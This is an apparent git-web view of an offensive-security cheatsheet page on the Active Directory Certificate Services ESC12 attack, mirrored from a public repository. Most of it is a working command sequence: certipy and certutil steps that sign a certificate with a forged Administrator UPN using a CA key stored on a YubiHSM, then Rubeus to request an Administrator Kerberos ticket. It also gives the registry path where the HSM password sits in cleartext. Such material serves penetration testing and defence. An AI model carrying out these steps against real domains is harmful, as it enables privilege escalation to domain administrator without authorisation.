daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc12.md (2590B)


      1 ---
      2 title: "Active Directory - Certificate ESC12"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc12.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc12.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC12
     12 
     13 ## ESC12 - ADCS CA on YubiHSM
     14 
     15 > The ESC12 vulnerability occurs when a Certificate Authority (CA) stores its private key on a YubiHSM2 device, which requires an authentication key (password) to access. This password is stored in the registry in cleartext, allowing an attacker with shell access to the CA server to recover the private key.
     16 
     17 **Requirements**:
     18 
     19 * CA certificate
     20 * Shell access on the root CA server
     21 
     22 **Exploitation**:
     23 
     24 * Generate a certicate for the user
     25 
     26   ```ps1
     27   certipy req -target dc-esc.esc.local -dc-ip 10.10.10.10 -u "user_esc12@esc.local" -p 'P@ssw0rd' -template User -ca <CA-Common-Name>
     28   certipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt
     29   certipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key
     30   ```
     31 
     32 * Importing the CA certificate into the user store
     33 
     34   ```ps1
     35   certutil -addstore -user my .\Root-CA-5.cer
     36   ```
     37 
     38 * Associated with the private key in the YubiHSM2 device
     39 
     40   ```ps1
     41   certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA-Common-Name>
     42   ```
     43 
     44 * Sign `user_esc12.crt` and specify a `Subject Alternative Name` using the `extension.inf` file.
     45 
     46   ```ps1
     47   certutil -sign ./user_esc12.crt new.crt @extension.inf
     48   ```
     49 
     50 * Content of extension.inf
     51 
     52   ```cs
     53   [Extensions]
     54   2.5.29.17 = "{text}"
     55   _continue_ = "UPN=Administrator@esc.local&"
     56   ```
     57 
     58 * Use the certificate to get the TGT of the Administrator
     59 
     60   ```ps1
     61   openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx
     62   Rubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap
     63   ```
     64 
     65 Unlocking the YubiHSM with the plaintext password in the registry key: `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`.
     66 
     67 ## References
     68 
     69 * [ESC12 – Shell access to ADCS CA with YubiHSM - hajo - October 2023](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)
     70 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)
     71 * [Exploitation de l’AD CS : ESC12, ESC13 et ESC14 - Guillon Bony Rémi - February, 2025](https://connect.ed-diamond.com/misc/mischs-031/exploitation-de-l-ad-cs-esc12-esc13-et-esc14)